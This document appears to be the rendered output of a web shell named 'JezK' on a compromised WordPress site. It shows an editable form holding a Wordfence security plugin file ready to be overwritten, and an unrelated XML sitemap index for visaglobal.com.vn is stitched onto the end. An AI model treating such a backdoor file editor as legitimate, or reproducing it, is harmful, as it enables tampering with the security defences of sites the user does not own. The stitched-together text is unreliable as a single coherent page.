
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>JezK</title>
<style>
    body {
        font-family: Arial, sans-serif;
        margin: 0;
        padding: 0;
    }
    #container {
        max-width: 800px;
        margin: 20px auto;
        padding: 20px;
        border: 1px solid #ccc;
        border-radius: 5px;
        background-color: #f9f9f9;
    }
    h1 {
        text-align: center;
        color: #333;
    }
    h2 {
        margin-top: 30px;
        color: #555;
    }
    ul {
        list-style-type: none;
        padding: 0;
    }
    li {
        margin-bottom: 10px;
    }
    a {
        text-decoration: none;
        color: #007bff;
    }
    a:hover {
        text-decoration: underline;
    }
    form {
        margin-top: 20px;
    }
    input[type="text"], input[type="file"], input[type="submit"] {
        margin-bottom: 10px;
    }
    hr {
        border: 0;
        height: 1px;
        background-color: #ccc;
        margin-top: 20px;
        margin-bottom: 20px;
    }
</style>
</head>
<body>
<div id="container">
    <h1>JezK</h1>
    <h2>Edit File: menu_tools.php</h2><form method="post"><textarea name="file_content" rows="10" cols="50">&lt;?php
if (!defined('WORDFENCE_VERSION')) { exit; }
/**
 * @var string $subpage
 * @var string $content
 */
?&gt;
&lt;?php
if (!wfOnboardingController::shouldShowAttempt3() &amp;&amp; wfConfig::get('touppPromptNeeded')) {
	echo wfView::create('gdpr/disabled-overlay')-&gt;render();
	echo wfView::create('gdpr/banner')-&gt;render();
}
?&gt;
&lt;div class=&quot;wrap wordfence&quot;&gt;
	&lt;div class=&quot;wf-container-fluid&quot;&gt;
		&lt;?php
		$tabsArray = array();
		if (wfCredentialsController::allowLegacy2FA()) {
			$tabsArray[] = array('twofactor', __('Two-Factor Authentication', 'wordfence'));
		}
		$tabsArray[] = array('livetraffic', __('Live Traffic', 'wordfence'));
		$tabsArray[] = array('auditlog', __('Audit Log', 'wordfence'));
		$tabsArray[] = array('whois', __('Whois Lookup', 'wordfence'));
		$tabsArray[] = array('importexport', __('Import/Export Options', 'wordfence'));
		$tabsArray[] = array('diagnostics', __('Diagnostics', 'wordfence'));

		$tabs = array();
		foreach ($tabsArray as $tab) {
			list($tabID, $tabLabel) = $tab;
			$tabs[] = new wfTab($tabID,
				network_admin_url('admin.php?page=WordfenceTools&amp;subpage=' . rawurlencode($tabID)),
				$tabLabel, $tabLabel, $subpage === $tabID);
		}

		echo wfView::create('common/page-fixed-tabbar', array(
			'tabs' =&gt; $tabs,
		))-&gt;render();
		?&gt;
		&lt;div class=&quot;wf-row&quot;&gt;
			&lt;div class=&quot;&lt;?php echo wfStyle::contentClasses(); ?&gt;&quot;&gt;
				&lt;div class=&quot;wf-tab-content wf-active&quot;&gt;
					&lt;?php echo $content ?&gt;
				&lt;/div&gt;
			&lt;/div&gt; &lt;!-- end content block --&gt;
		&lt;/div&gt; &lt;!-- end row --&gt;
	&lt;/div&gt; &lt;!-- end container --&gt;
&lt;/div&gt;</textarea><br><input type="submit" value="Save"></form></div>
</body>
</html>

<?xml version="1.0" encoding="UTF-8"?><?xml-stylesheet type="text/xsl" href="//visaglobal.com.vn/main-sitemap.xsl"?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9">
	<sitemap>
		<loc>https://visaglobal.com.vn/post-sitemap1.xml</loc>
		<lastmod>2026-08-28T06:51:31+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://visaglobal.com.vn/post-sitemap2.xml</loc>
		<lastmod>2026-08-27T04:35:16+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://visaglobal.com.vn/post-sitemap3.xml</loc>
		<lastmod>2026-08-27T04:24:40+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://visaglobal.com.vn/page-sitemap.xml</loc>
		<lastmod>2026-08-26T09:38:50+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://visaglobal.com.vn/category-sitemap.xml</loc>
		<lastmod>2026-08-28T06:51:31+00:00</lastmod>
	</sitemap>
	<sitemap>
		<loc>https://visaglobal.com.vn/video-sitemap.xml</loc>
		<lastmod>2026-08-26T09:38:50+00:00</lastmod>
	</sitemap>
</sitemapindex>
<!-- XML Sitemap generated by Rank Math SEO Plugin (c) Rank Math - rankmath.com -->